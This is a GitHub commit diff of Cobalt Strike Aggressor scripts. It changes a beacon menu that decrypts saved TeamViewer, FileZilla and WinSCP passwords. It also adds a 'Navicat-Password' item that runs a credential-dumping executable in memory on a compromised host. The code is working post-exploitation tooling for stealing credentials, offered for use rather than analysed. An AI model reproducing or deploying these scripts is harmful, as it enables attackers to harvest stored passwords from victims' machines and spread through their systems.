Add files via upload

This commit is contained in:
TimWhite
2020-02-26 02:25:26 +08:00
committed by GitHub
parent ea98f081df
commit 23397231b8
4 changed files with 17 additions and 2 deletions
+2 -2
View File
@@ -13,8 +13,8 @@ popup beacon_bottom {
item "DecryptPwd" {
$bid = $1['@'];
$dialog = dialog("SharpDecryptPwd", %(type => "-NavicatCrypto",bid => $bid), &SharpDecryptPwd);
drow_combobox($dialog, "type", "Type:", @("-NavicatCrypto", "-TeamViewer", "-FileZilla", "-WinSCP"));
$dialog = dialog("SharpDecryptPwd", %(type => "-WinSCP",bid => $bid), &SharpDecryptPwd);
drow_combobox($dialog, "type", "Type:", @("-TeamViewer", "-FileZilla", "-WinSCP"));
dbutton_action($dialog, "Chong!!!");
dialog_show($dialog);
}
Binary file not shown.
+15
View File
@@ -0,0 +1,15 @@
sub navicat_password{
bexecute_assembly($bid, script_resource("modules/navicatpwd.exe"));
}
popup beacon_bottom {
menu "NaviDecrypt" {
item "Navicat-Password"{
$bid = $1['@'];
navicat_password($bid);
}
}
}
Binary file not shown.